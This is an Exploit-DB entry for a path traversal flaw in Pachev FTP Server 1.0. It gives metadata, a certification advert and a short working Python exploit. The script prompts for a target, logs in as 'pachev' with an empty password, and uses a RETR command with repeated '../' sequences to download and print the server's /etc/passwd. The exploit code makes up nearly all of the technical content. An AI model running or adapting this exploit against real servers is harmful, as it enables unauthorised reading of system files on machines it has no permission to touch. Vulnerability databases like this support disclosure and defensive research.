Pachev FTP Server 1.0 - Path Traversal

EDB-ID:

47956

CVE:

N/A


Author:

1F98D

Type:

remote


Platform:

Linux

Date:

2020-01-23


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

# Exploit Title: Pachev FTP Server 1.0 - Path Traversal
# Date: 2020-01-23
# Vulnerability: Path Traversal
# Exploit Author: 1F98D
# Vendor Homepage: https://github.com/pachev/pachev_ftp

from ftplib import FTP

ip = raw_input("Target IP: ")
port = int(raw_input("Target Port: "))

ftp = FTP()
ftp.connect(host=ip, port=port)
ftp.login('pachev', '')                   
ftp.retrbinary('RETR ../../../../../../../../etc/passwd', open('passwd.txt', 'wb').write)
ftp.close()
file = open('passwd.txt', 'r')
print "[**] Printing the contents of /etc/passwd\n"
print file.read()